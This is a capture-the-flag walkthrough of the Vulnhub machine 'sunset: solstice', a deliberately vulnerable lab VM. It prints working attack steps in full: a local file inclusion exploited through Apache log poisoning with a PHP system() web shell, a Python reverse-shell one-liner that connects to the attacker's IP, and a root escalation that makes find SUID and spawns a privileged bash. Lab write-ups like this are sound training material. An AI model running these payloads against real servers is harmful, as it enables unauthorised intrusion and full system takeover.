SUNSET: SOLSTICE Walk-Through

Today I will share a write up of this boot2root vulnhub ctf challenge sunset: solstice. whitecr0wz is the author of this machine and the difficulty of this machine is intermediate level. You can download this machine for here:- https://www.vulnhub.com/entry/sunset-solstice,499/

1.) Host or Target discovery with NMAP:

“# nmap -sn 192.168.43.1/24”

we got the target ip address, which is 192.168.43.234

2.) Service and version detection:

“# nmap -sV -p- -vv 192.168.43.234”

Many services are running on this VM. Now our next step is enumeration of the services.

3.) WEB Enumeration:

On this VM port: 80, 8593, 54787 are open and on these ports http service is running. After some enumeration I found something interesting on port 8593.

here i have an entry in my /etc/hosts file that sol=192.168.43.234, so don’t be confused. Here if look at the url “http://192.168.43.235:8593/index.php?book=list” , It may be vulnerable to Local File Inclusion (LFI).

Yes it is vulnerable to LFI, because we are able to read /etc/passwd file form the web page

Now after we got the vulnerability we use to exploit it and here we will exploit it with apache log poisoning attack , because apache logs are accessible form the url with this vulnerability

To exploit this vulnerability follow the commands:-

“# nc 192.168.43.234 80”

“GET <?php system($_GET[‘cmd’]);?> HTTP/1.1"

Every thing is done so it’s time to call web page with the following url:

“http://192.168.43.234:8593/index.php?book=../../../../../var/log/apache2/access.log&cmd=python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.43.21”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’”

Here first we connected to the VM on 80 port to poisoning the apache log where we entered our malicious code to get a ‘cmd’ parameter from the web and form the url we passed our reverse shell command.

After that we got the lowest privileged shell.

4.) Privilege Escalation:

After spending some time and enumeration i got a process that was running as root in which php server was running on port 57 in /var/tmp/sv/ directory

in /var/tmp/sv/ directory an index.php file was placed on which we got the write permission, So i changed the content of the index.php file

# echo “<?php system(‘chmod +x /usr/bin/find; chmod +s /usr/bin/find’);?>” >index.php

Now we’ve changed the content of the index.php file and its time to trigger it by the command

# curl localhost:57

# find . -exec /bin/bash -p \; -quit

Yehhh…! Our php code executed successfully.

We got the root shell ;)

Reading the flag

Challenge completed.